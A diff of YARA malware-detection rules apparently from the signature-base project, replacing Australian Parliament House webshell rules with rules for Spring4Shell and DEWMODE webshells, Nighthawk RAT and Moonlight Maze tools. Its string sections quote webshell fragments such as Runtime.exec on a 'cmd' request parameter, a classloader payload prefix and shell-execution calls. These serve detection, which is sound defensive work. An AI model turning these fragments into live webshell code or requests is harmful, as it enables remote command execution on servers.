+		logic_hash = "39fb62ec7953dae0a88e39e73e3ff286fc19cb8f21f8feb869a1875f6ba70cfb"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$x1 = "eval(" ascii wide
+		$x1 = "java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di"
+		$x2 = "?pwd=j&cmd=whoami"
+		$x3 = ".getParameter(%22pwd%22)"
+		$x4 = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7B"
 
 	condition:
-		( uint16( 0 ) == 0x3f3c or uint16( 0 ) == 0x253c ) and filesize < 40 and $x1
+		1 of them
 }
-rule SIGNATURE_BASE_APT_Webshell_AUS_Tiny_2 : FILE
+rule SIGNATURE_BASE_EXPL_POC_Springcore_0Day_Webshell_Mar22_1 : FILE
 {
 	meta:
-		description = "Detetcs a tiny webshell involved in the Australian Parliament House network compromise"
+		description = "Detects webshell found after SpringCore exploitation attempts POC script"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4746d4ce-628a-59b0-9032-7e0759d96ad3"
-		date = "2019-02-18"
+		id = "e7047c98-3c60-5211-9ad5-2bfdfb35d493"
+		date = "2022-03-30"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_aus_parl_compromise.yar#L25-L38"
+		reference = "https://twitter.com/vxunderground/status/1509170582469943303"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_spring4shell.yar#L36-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e26c265d2b1606257d8c843921601f14cae2beaf246f8e37daeeb6c5ff12f289"
-		score = 75
+		logic_hash = "17282b66899356a6051f0b47a7a3f02265737283d760f2256e03a2b934bb63b8"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "0d6209d86f77a0a69451b0f27b476580c14e0cda15fa6a5003aab57a93e7e5a5"
 
 	strings:
-		$x1 = "Request.Item[System.Text.Encoding.UTF8.GetString(Convert.FromBase64String(\"[password]\"))];" ascii
-		$x2 = "eval(arguments,System.Text.Encoding.UTF8.GetString(Convert.FromBase64String(\"" ascii
+		$x1 = ".getInputStream(); int a = -1; byte[] b = new byte[2048];"
+		$x2 = "if(\"j\".equals(request.getParameter(\"pwd\")"
+		$x3 = ".getRuntime().exec(request.getParameter(\"cmd\")).getInputStream();"
 
 	condition:
-		( uint16( 0 ) == 0x3f3c or uint16( 0 ) == 0x253c ) and filesize < 1KB and 1 of them
+		filesize < 200KB and 1 of them
 }
-rule SIGNATURE_BASE_APT_Webshell_AUS_Jscript_3 : FILE
+rule SIGNATURE_BASE_WEBSHELL_APT_PHP_DEWMODE_UNC2546_Feb21_1 : FILE
 {
 	meta:
-		description = "Detetcs a webshell involved in the Australian Parliament House network compromise"
+		description = "Detects DEWMODE webshells"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ff7e780b-ccf9-53b6-b741-f04a8cbaf580"
-		date = "2019-02-18"
+		id = "ea883f25-0e9b-5617-b05e-191a4a5c5a52"
+		date = "2021-02-22"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_aus_parl_compromise.yar#L40-L53"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unc2546_dewmode.yar#L2-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e144e555dd80e15ac9072a645e629a86ca1a6b52949d236ec3daedbf06bd6718"
+		logic_hash = "86ce185f6350eb7485bce5bd31d91085fed25aa8ce78813e1c3c3dffbaae58ff"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = "FILE"
-		hash1 = "7ac6f973f7fccf8c3d58d766dec4ab7eb6867a487aa71bc11d5f05da9322582d"
+		hash1 = "2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7"
+		hash2 = "5fa2b9546770241da7305356d6427847598288290866837626f621d794692c1b"
 
 	strings:
-		$s1 = "<%@ Page Language=\"Jscript\" validateRequest=\"false\"%><%try{eval(System.Text.Encoding.UTF8.GetString(Convert.FromBase64String" ascii
-		$s2 = ".Item[\"[password]\"])),\"unsafe\");}" ascii
+		$x1 = "<font size=4>Cleanup Shell</font></a>';" ascii fullword
+		$x2 = "$(sh /tmp/.scr)"
+		$x3 = "@system('sudo /usr/local/bin/admin.pl --mount_cifs=" ascii
+		$s1 = "target=\\\"_blank\\\">Download</a></td>\";" ascii
+		$s2 = ",PASSWORD 1>/dev/null 2>/dev/null');" ascii
+		$s3 = ",base64_decode('" ascii
+		$s4 = "include \"remote.inc\";" ascii
+		$s5 = "@system('sudo /usr/local" ascii
 
 	condition:
-		uint16( 0 ) == 0x6568 and filesize < 1KB and all of them
+		uint16( 0 ) == 0x3f3c and filesize < 9KB and ( 1 of ( $x* ) or 2 of them ) or 3 of them
 }
-rule SIGNATURE_BASE_APT_Webshell_AUS_4 : FILE
+rule SIGNATURE_BASE_SUSP_Nullsoftinst_Combo_Oct20_1 : FILE
 {
 	meta:
-		description = "Detetcs a webshell involved in the Australian Parliament House network compromise"
+		description = "Detects suspicious NullSoft Installer combination with common Copyright strings"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bb5b10d1-3528-5361-92fc-8440c65dcda4"
-		date = "2019-02-18"
+		id = "380f30a6-df6b-50c6-bb2d-b8785564bbac"
+		date = "2020-10-06"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_aus_parl_compromise.yar#L56-L71"
+		reference = "https://twitter.com/malwrhunterteam/status/1313023627177193472"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_anomalies_keyword_combos.yar#L2-L33"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4a4f26b50631021979e4a8246a1e1c10150f4fb03eb7d77a1042e41ef57b3961"
-		score = 75
+		logic_hash = "8aef24295281da5ffa1c6f865eaa6cc8d60ea1df670058220bdb97651b6114cd"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		hash1 = "83321c02339bb51735fbcd9a80c056bd3b89655f3dc41e5fef07ca46af09bb71"
+		hash1 = "686b5240e5e503528cc5ac8d764883413a260716dd290f114a60af873ee6a65f"
+		hash2 = "93951379e57e4f159bb62fd7dd563d1ac2f3f23c80ba89f2da2e395b8a647dcf"
+		hash3 = "a9ca1d6a981ccc8d8b144f337c259891a67eb6b85ee41b03699baacf4aae9a78"
 
 	strings:
-		$s1 = "wProxy.Credentials = new System.Net.NetworkCredential(pusr, ppwd);" fullword ascii
-		$s2 = "{return System.Text.Encoding.UTF8.GetString(Convert.FromBase64String(" ascii
-		$s3 = ".Equals('User-Agent', StringComparison.OrdinalIgnoreCase))" ascii
-		$s4 = "gen.Emit(System.Reflection.Emit.OpCodes.Ret);" fullword ascii
+		$a1 = "NullsoftInst" ascii
+		$b1 = "Microsoft Corporation" wide fullword
+		$b2 = "Apache Software Foundation" ascii wide fullword
+		$b3 = "Simon Tatham" wide fullword
+		$fp1 = "nsisinstall" fullword ascii
+		$fp2 = "\\REGISTRY\\MACHINE\\Software\\" wide
+		$fp3 = "Apache Tomcat" wide fullword
+		$fp4 = "Bot Framework Emulator" wide fullword
+		$fp5 = "Firefox Helper" wide fullword
+		$fp6 = "Paint.NET Setup" wide fullword
+		$fp7 = "Microsoft .NET Services Installation Utility" wide fullword
+		$fp8 = "License: MPL 2" wide
 
 	condition:
-		uint16( 0 ) == 0x7566 and filesize < 10KB and 3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and $a1 and 1 of ( $b* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_APT_Script_AUS_4 : FILE
+
+rule SIGNATURE_BASE_EXT_HKTL_Nighthawk_RAT : FILE
 {
 	meta:
-		description = "Detetcs a script involved in the Australian Parliament House network compromise"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5cbf2476-5ce8-540d-b87b-e400daf49b43"
-		date = "2019-02-18"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_aus_parl_compromise.yar#L73-L90"
+		description = "Detects Nighthawk RAT"
+		author = "Frank Boldewin (@r3c0nst)"
+		id = "7a58b8bf-fb14-5758-bc2a-ad2c6fff1216"
+		date = "2022-11-22"
+		modified = "2025-07-01"
+		reference = "https://www.proofpoint.com/us/blog/threat-insight/nighthawk-and-coming-pentest-tool-likely-gain-threat-actor-notice"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_nighthawk_c2.yar#L3-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3a81365572380964abe07a1ec16a9ea299bf16a4e624285faaa6f72c44f762d2"
+		logic_hash = "46404445e1fee89b598b0d42888f793dd602533cff2f72524800597af5b61197"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
-		hash1 = "fdf15f388a511a63fbad223e6edb259abdd4009ec81fcc87ce84f0f2024c8057"
+		hash1 = "0551ca07f05c2a8278229c1dc651a2b1273a39914857231b075733753cb2b988"
+		hash2 = "9a57919cc5c194e28acd62719487c563a8f0ef1205b65adbe535386e34e418b8"
+		hash3 = "38881b87826f184cc91559555a3456ecf00128e01986a9df36a72d60fb179ccf"
+		hash4 = "f3bba2bfd4ed48b5426e36eba3b7613973226983a784d24d7a20fcf9df0de74e"
+		hash5 = "b775a8f7629966592cc7727e2081924a7d7cf83edd7447aa60627a2b67d87c94"
 
 	strings:
-		$x1 = "myMutex = CreateMutex(0, 1, \"teX23stNew\")" fullword ascii
-		$x2 = "mmpath = Environ(appdataPath) & \"\\\" & \"Microsoft\" & \"\\\" & \"mm.accdb\"" fullword ascii
-		$x3 = "Dim mmpath As String, newmmpath  As String, appdataPath As String" fullword ascii
-		$x4 = "'MsgBox \"myMutex Created\" Do noting" fullword ascii
-		$x5 = "appdataPath = \"app\" & \"DatA\"" fullword ascii
-		$x6 = ".DoCmd.Close , , acSaveYes" fullword ascii
+		$pattern1 = { 48 8d 0d ?? ?? ?? ?? 51 5a 48 81 c1 ?? ?? ?? ?? 48 81 c2 ?? ?? ?? ?? ff e2 }
+		$pattern2 = { 66 03 D2 66 33 D1 66 C1 E2 02 66 33 D1 66 23 D0 0F B7 C1 }
+		$pattern3 = { FF 7F 48 3B F0 48 0F 47 F0 48 8D }
+		$pattern4 = { 65 48 8B 04 25 30 00 00 00 8B 40 68 49 89 CA 0F 05 C3 }
+		$pattern5 = { 48 B8 AA AA AA AA AA AA AA 02 48 ?? ?? ?? ?? 0F 84 }
+		$pattern6 = { 65 48 8B 04 25 30 00 00 00 48 8B 80 }
 
 	condition:
-		filesize < 7KB and 1 of them
+		uint16( 0 ) == 0x5A4D and filesize < 2MB and ( 3 of ( $pattern* ) or ( pe.section_index ( ".profile" ) >= 0 and pe.section_index ( ".detourc" ) >= 0 and pe.section_index ( ".detourd" ) >= 0 ) )
 }
-rule SIGNATURE_BASE_APT_Webshell_AUS_5 : FILE
+rule SIGNATURE_BASE_HKTL_MAL_Nighthawk_Nov_2022_1 : NIGHTHAWK BEACON FILE
 {
 	meta:
-		description = "Detetcs a webshell involved in the Australian Parliament House network compromise"
-		author = "Florian Roth (Nextron Systems)"
-		id = "59b3f6aa-2d3b-54b4-b543-57bd9d981e87"
-		date = "2019-02-18"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_aus_parl_compromise.yar#L92-L111"
+		description = "Detect the Nighthawk dropped beacon"
+		author = "Arkbird_SOLG"
+		id = "a46d5034-e8e3-5c30-90d9-ea97b8384341"
+		date = "2022-11-22"
+		modified = "2025-07-01"
+		reference = "https://web.archive.org/web/20221125224850/https://www.proofpoint.com/us/blog/threat-insight/nighthawk-and-coming-pentest-tool-likely-gain-threat-actor-notice"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_nighthawk_c2.yar#L32-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fb0e53e5561f7f14f2ad6afcda2798d353cf4d54d12ae3354b03d62ed0c00bf3"
+		logic_hash = "8dec7752ee6e1af87129ce7ac09130f94a20807c4f45ceb1fce434358ac727bf"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "54a17fb257db2d09d61af510753fd5aa00537638a81d0a8762a5645b4ef977e4"
+		tags = "NIGHTHAWK, BEACON, FILE"
+		hash1 = "0551ca07f05c2a8278229c1dc651a2b1273a39914857231b075733753cb2b988"
+		hash2 = "9a57919cc5c194e28acd62719487c563a8f0ef1205b65adbe535386e34e418b8"
+		hash3 = "f3bba2bfd4ed48b5426e36eba3b7613973226983a784d24d7a20fcf9df0de74e"
 
 	strings:
-		$a1 = "function DEC(d){return System.Text.Encoding.UTF8.GetString(Convert.FromBase64String(d));}" fullword ascii
-		$a2 = "function ENC(d){return Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(d));}" fullword ascii
-		$s1 = "var hash=DEC(Request.Item['" ascii
-		$s2 = "Response.Write(ENC(SET_ASS_SUCCESS));" fullword ascii
-		$s3 = "hashtable[hash] = assCode;" fullword ascii
-		$s4 = "Response.Write(ss);" fullword ascii
-		$s5 = "var hashtable = Application[CachePtr];" fullword ascii
+		$s1 = { 44 8b ff 45 33 c0 48 8d 15 [2] 0a 00 48 8d 4d c0 e8 [2] ff ff 45 33 c0 48 8d 15 [2] 0a 00 48 8d 4d 20 e8 [2] ff ff 45 33 c0 48 8d 15 [2] 0a 00 48 8d 4d 00 e8 [2] ff ff 45 33 c0 48 8d 15 [2] 0a 00 48 8d 4d e0 e8 [2] ff ff 33 d2 e9 ee 04 00 00 48 8d 44 24 68 48 89 44 24 20 41 b9 01 00 00 00 45 33 c0 48 8d 95 a0 00 00 00 ff 15 [2] 09 00 85 c0 0f 85 74 04 00 00 48 89 7c 24 28 48 89 7c 24 20 45 33 c9 45 33 c0 48 8d 15 [2] 0a 00 48 8b 4c 24 68 ff 15 [2] 09 00 85 }
+		$s2 = { 4d 85 c0 0f 84 83 00 00 00 49 21 18 33 d2 44 8d 43 01 33 c9 ff 15 [2] 08 00 48 8b f0 48 85 c0 74 6a 44 8d 43 04 48 8b d5 48 8b c8 ff 15 [2] 08 00 48 8b e8 48 85 c0 74 49 48 8d 44 24 70 33 d2 44 8d 4b 24 48 89 44 24 20 4c 8d 44 24 30 48 8b cd ff 15 [2] 08 00 8b }
+		$s3 = { 48 85 c0 0f 84 [2] 00 00 4d 8b cc 49 83 7c 24 18 08 72 04 4d 8b 0c 24 4d 8b c5 49 83 7d 18 08 72 04 4d 8b 45 00 49 8b ?? 49 83 ?? 18 08 72 03 49 8b }
+		$s4 = { 44 8b 44 24 44 4c 89 [2-3] 89 95 00 02 00 00 2b c7 8b d7 49 03 d0 48 03 d1 4c 8d 8d 00 02 00 00 44 8b c0 49 8b cf ff 15 [2] 04 00 33 d2 85 c0 0f 84 [2] ff ff 03 bd 00 02 00 00 8b 44 24 40 3b f8 48 8b 4d ?? 4c 8b }
 
 	condition:
-		uint16( 0 ) == 0x7566 and filesize < 2KB and 4 of them
+		uint16( 0 ) == 0x5A4D and filesize > 60KB and all of ( $s* )
 }
-rule SIGNATURE_BASE_HKTL_Lazycat_Logeraser
+rule SIGNATURE_BASE_Apt_RU_Moonlightmaze_Customlokitools : FILE
 {
 	meta:
-		description = "Detetcs a tool used in the Australian Parliament House network compromise"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a3d74657-a389-5482-ab26-966e790afd50"
-		date = "2019-02-18"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_aus_parl_compromise.yar#L113-L135"
+		description = "Rule to detect Moonlight Maze Loki samples by custom attacker-authored strings"
+		author = "Kaspersky Lab"
+		id = "d5795d3b-bbb1-59e9-b86d-666b5c911f3b"
+		date = "2017-03-15"
+		modified = "2017-03-22"
+		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_moonlightmaze.yar#L11-L47"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2b4b69dd675172b9b0c08fac674b6daa107535694b4073750501627fb48d12c2"
+		hash = "14cce7e641d308c3a177a8abb5457019"
+		hash = "a3164d2bbc45fb1eef5fde7eb8b245ea"
+		hash = "dabee9a7ea0ddaf900ef1e3e166ffe8a"
+		hash = "1980958afffb6a9d5a6c73fc1e2795c2"
+		hash = "e59f92aadb6505f29a9f368ab803082e"
+		logic_hash = "4e1f60b045c10758354f110c3778b8ffd7f10b5e229b3f2f821287476620bec9"
 		score = 75
-		quality = 35
-		tags = ""
-		hash1 = "1c113dce265e4d744245a7c55dadc80199ae972a9e0ecbd0c5ced57067cf755b"
-		hash2 = "510375f8142b3651df67d42c3eff8d2d880987c0e057fc75a5583f36de34bf0e"
+		quality = 85
+		tags = "FILE"
+		version = "1.1"
 
 	strings:
-		$x1 = "LazyCat.dll" ascii wide fullword
-		$x2 = ".local_privilege_escalation.rotten_potato" ascii wide
-		$x3 = "LazyCat.Extension" ascii wide
-		$x4 = " MEOWof" ascii wide
-		$x5 = "VirtualSite: {0}, Address: {1:X16}, Name: {2}, Handle: {3:X16}, LogPath: {4}" fullword wide
-		$s1 = "LazyCat" fullword ascii wide
-		$s2 = "$e3ff37f2-85d7-4b24-a385-7eeb1f5a9562"
-		$s3 = "local -> remote {0} bytes"
-		$s4 = "remote -> local {0} bytes"
+		$a1 = "Write file Ok..." ascii wide
+		$a2 = "ERROR: Can not open socket...." ascii wide
+		$a3 = "Error in parametrs:" ascii wide
+		$a4 = "Usage: @<get/put> <IP> <PORT> <file>" ascii wide
+		$a5 = "ERROR: Not connect..." ascii wide
+		$a6 = "Connect successful...." ascii wide
+		$a7 = "clnt <%d> rqstd n ll kll" ascii wide
+		$a8 = "clnt <%d> rqstd swap" ascii wide
+		$a9 = "cld nt sgnl prcs grp" ascii wide
+		$a10 = "cld nt sgnl prnt" ascii wide
+		$a11 = "ork error" ascii fullword
 
 	condition:
-		3 of them
+		filesize < 5000KB and 3 of ( $a* )
 }
-rule SIGNATURE_BASE_HKTL_Powerkatz_Feb19_1
+rule SIGNATURE_BASE_Apt_RU_Moonlightmaze_Customsniffer
 {
 	meta:
-		description = "Detetcs a tool used in the Australian Parliament House network compromise"
-		author = "Florian Roth (Nextron Systems)"
-		id = "294d6f6c-dbc8-5431-87a0-64abe582c4ea"
-		date = "2019-02-18"
+		description = "Rule to detect Moonlight Maze sniffer tools"
+		author = "Kaspersky Lab"
+		id = "8cc76e4d-a956-543c-81e0-827dfdb5da1c"
+		date = "2017-03-15"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_aus_parl_compromise.yar#L137-L152"
+		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_moonlightmaze.yar#L50-L79"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d1d39d68c5c5a3f6142a966925e2a136e937bc09abddd4080862346683886455"
+		hash = "7b86f40e861705d59f5206c482e1f2a5"
+		hash = "927426b558888ad680829bd34b0ad0e7"
+		logic_hash = "5ccf9035adc16393db4b3d461f7a20f86f538275d7806280a15508c15d9c805c"
 		score = 75
 		quality = 85
 		tags = ""
+		version = "1.1"
+		original_filename = "ora;tdn"
 
 	strings:
-		$x1 = "Powerkatz32" ascii wide fullword
-		$x2 = "Powerkatz64" ascii wide
-		$s1 = "GetData: not found taskName" fullword ascii wide
-		$s2 = "GetRes Ex:" fullword ascii wide
+		$a1 = "/var/tmp/gogo" fullword
+		$a2 = "myfilename= |%s|" fullword
+		$a3 = "mypid,mygid=" fullword
+		$a4 = "mypid=|%d| mygid=|%d|" fullword
+		$a5 = "/var/tmp/task" fullword
+		$a6 = "mydevname= |%s|" fullword
 
 	condition:
-		1 of ( $x* ) and 1 of ( $s* )
+		2 of ( $a* )
 }
-rule SIGNATURE_BASE_HKTL_Unknown_Feb19_1
+rule SIGNATURE_BASE_Loki2Crypto
 {
 	meta:
-		description = "Detetcs a tool used in the Australian Parliament House network compromise"
-		author = "Florian Roth (Nextron Systems)"
-		id = "bdcadc4b-8881-5dc7-b203-4e79cbc850ed"
-		date = "2019-02-18"
+		description = "Rule to detect hardcoded DH modulus used in 1996/1997 Loki2 sourcecode; #ifdef STRONG_CRYPTO /* 384-bit strong prime */"
+		author = "Costin Raiu, Kaspersky Lab"
+		id = "d67288f8-5205-5882-8dff-041d092eea4f"
+		date = "2017-03-21"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_aus_parl_compromise.yar#L154-L172"
+		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_moonlightmaze.yar#L82-L106"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "231c771ed24106a8daf352a0df1bc2db43ebd8d1108d7fa1162d03d40e738d46"
+		hash = "19fbd8cbfb12482e8020a887d6427315"
+		hash = "ea06b213d5924de65407e8931b1e4326"
+		hash = "14ecd5e6fc8e501037b54ca263896a11"
+		hash = "e079ec947d3d4dacb21e993b760a65dc"
+		hash = "edf900cebb70c6d1fcab0234062bfc28"
+		logic_hash = "c2315dafb0ecb9e6babd526a028835f3513218c1e667c81088c49ad13dbab5be"
 		score = 75
 		quality = 85
 		tags = ""
+		version = "1.0"
 
 	strings:
-		$x1 = "not a valid timeout format!" ascii wide fullword
-		$x2 = "host can not be empty!" ascii wide fullword
-		$x3 = "not a valid port format!" ascii wide fullword
-		$x4 = "{0} - {1} TTL={2} time={3}" ascii wide fullword
-		$x5 = "ping count is not a correct format!" ascii wide fullword
-		$s1 = "The result is too large,program store to '{0}'.Please download it manully." fullword ascii wide
-		$s2 = "C:\\Windows\\temp\\" ascii wide
+		$modulus = {DA E1 01 CD D8 C9 70 AF C2 E4 F2 7A 41 8B 43 39 52 9B 4B 4D E5 85 F8 49}
 
 	condition:
-		1 of ( $x* ) or 2 of them
+		( any of them )
 }
-
-rule SIGNATURE_BASE_MAL_Nitol_Malware_Jan19_1 : FILE
+rule SIGNATURE_BASE_Apt_RU_Moonlightmaze_De_Tool
 {
 	meta:
-		description = "Detects Nitol Malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5b9968a8-31ba-593b-9e01-b69a4e31fe65"
-		date = "2019-01-14"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/shotgunner101/status/1084602413691166721"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_mal_nitol.yar#L4-L31"
+		description = "Rule to detect Moonlight Maze 'de' and 'deg' tunnel tool"
+		author = "Kaspersky Lab"
+		id = "09bfebca-7cec-5514-9f48-c0c2c57efcf9"
+		date = "2017-03-27"
+		modified = "2017-03-27"
+		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_moonlightmaze.yar#L111-L137"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4607496beb37500637c1e5509b42c0fe6f9e79548c85603819dc966fa2cc2be0"
+		hash = "4bc7ed168fb78f0dc688ee2be20c9703"
+		hash = "8b56e8552a74133da4bc5939b5f74243"
+		logic_hash = "f658e1aa2ddb84fe3c1de7c7c00f2148d232cf2b3381c298420abfc382c02986"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e"
+		tags = ""
+		version = "1.0"
 
 	strings:
-		$xc1 = { 00 25 75 20 25 73 00 00 00 30 2E 30 2E 30 2E 30
-               00 25 75 20 4D 42 00 00 00 25 64 2A 25 75 25 73
-               00 7E 4D 48 7A }
-		$xc2 = "GET ^&&%$%$^" ascii
-		$n1 = ".htmGET " ascii
-		$s1 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)" fullword ascii
-		$s2 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)" fullword ascii
-		$s3 = "User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0" fullword ascii
-		$s4 = "User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" fullword ascii
+		$a1 = "Vnuk: %d" ascii fullword
+		$a2 = "Syn: %d" ascii fullword
+		$a3 = {25 73 0A 25 73 0A 25 73 0A 25 73 0A}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( pe.imphash ( ) == "286870a926664a5129b8b68ed0d4a8eb" or 1 of ( $x* ) or #n1 > 4 or 4 of them )
+		(( 2 of ( $a* ) ) )
 }
-rule SIGNATURE_BASE_Unspecified_Malware_Jul17_2C : FILE
+rule SIGNATURE_BASE_Apt_RU_Moonlightmaze_Cle_Tool
 {
 	meta:
-		description = "Unspecified Malware - CN relation"
-		author = "Florian Roth (Nextron Systems)"
-		id = "91e760e8-7460-54af-a794-0b41a4b19760"
-		date = "2017-07-18"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/CX3KaY"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_unspecified_malware.yar#L3-L26"
+		description = "Rule to detect Moonlight Maze 'cle' log cleaning tool"
+		author = "Kaspersky Lab"
+		id = "99ae07b9-eb42-53dc-bd8b-75ab6a0b8cab"
+		date = "2017-03-27"
+		modified = "2017-03-27"
+		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_moonlightmaze.yar#L140-L167"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a078b96ea15b287c8aed960741865aeac356ec8650eac71b8e28f2f1924ec956"
+		hash = "647d7b711f7b4434145ea30d0ef207b0"
+		logic_hash = "a4bbd7be617b944a656fa58ca9ec6384f624c95250de6b8a6ba63e7c3387484c"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e8156ec1706716cada6f57b6b8ccc9fb0eb5debe906ac45bdc2b26099695b8f5"
+		tags = ""
+		version = "1.0"
 
 	strings:
-		$x1 = "%AllUsersProfile%\\DeviceSync\\m.exe" fullword wide
-		$x2 = "freenow.chickenkiller.com" fullword ascii
-		$x3 = "\\Release\\PhantomNet-SSL.pdb" ascii
-		$s1 = "SELECT * FROM AntiVirusProduct" fullword ascii
-		$s2 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/%08X-%04X-%04X-%02X%02X%02X%02X" fullword ascii
-		$s3 = "Proxy-Authenticate: Basic" fullword ascii
-		$s4 = "Proxy-Authenticate: NTLM" fullword ascii
-		$s5 = "Root\\SecurityCenter2" fullword wide
-		$s6 = "aaabbbcccddd" fullword ascii
+		$a1 = "./a filename template_file" ascii wide
+		$a2 = "May be %s is empty?" ascii wide
+		$a3 = "template string = |%s|" ascii wide
+		$a4 = "No blocks !!!"
+		$a5 = "No data in this block !!!!!!" ascii wide
+		$a6 = "No good line"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) or 4 of ( $s* ) ) ) or ( all of them )
+		(( 3 of ( $a* ) ) )
 }
-rule SIGNATURE_BASE_VUL_Tomcat_Catalina_CVE_2020_1938 : FILE
